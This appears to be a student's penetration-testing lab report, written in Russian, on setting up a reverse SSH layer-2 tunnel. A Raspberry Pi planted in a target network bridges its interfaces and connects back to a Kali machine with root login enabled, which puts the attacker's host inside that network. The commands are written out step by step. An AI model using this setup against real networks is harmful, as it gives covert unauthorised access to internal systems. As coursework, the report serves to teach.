# Тестрирование на проникновение. Практика №4. Revers Shells & Reverse SSH connections
## Автор
Максимов Даниил Сергеевич БСБО-04-19
## Топология
Топология данной практической работы представлна ниже.

## Задание
### Насторойка raspberrypi(Debian)
Для объединения двух интерфейсов в мост необходимо изменить кофигурационный файл по следующему пути ```/etc/network/interfaces``` таким образом как это показано на рисунке ниже (предварительно установив ```bridge-utils```) . Это нужно для того, чтобы интерфейсы ens3 и ens4 пропускали трафик, как это делают коммутаторы.

Настроив мост (br0), убедимся, что трафик проходит через него. Для этого нужно прописать команду ```tcpdump -i br0 | grep ICMP```, чтобы просматривать проходящий трафик, также на, например, win7 пропинговать 8.8.8.8.

Гугл пингуется, трафик проходит.
### Настройка kali linux
Теперь необходимо настроить kali linux. Для начала в конфигурационном файле, расположенном по пути ```/etc/ssh/shhd_config``` нужно разрешить туннелирование и логиниться от root. Также следует поменять пароль для root.


### ssh туннель
Для создание ssh туннеля необходимо с raspberrypi, находящейся в интересмующей злоумышленника структуре, выполнить ssh подлюключение с созданием туннеля с помощью команды ```ssh root@192.168.123.129 -o Tunnel=ethernet -w any:any```.

Установив подключение, на kali и на debian появился интерфейс tap0, поднимем его командой ```ip link set dev tap0 up```.

Теперь добавим tap0 в мост br0 командой ```brctl addif br0 tap0``` и проверим, что сюда идет трафик с помощьб команды ```tcpdump -i tap0```


Далее получим ip-address на этот интерфейс командой ```dhclient tap0```. Ip получен.

Попробуем зайти на файрволл.
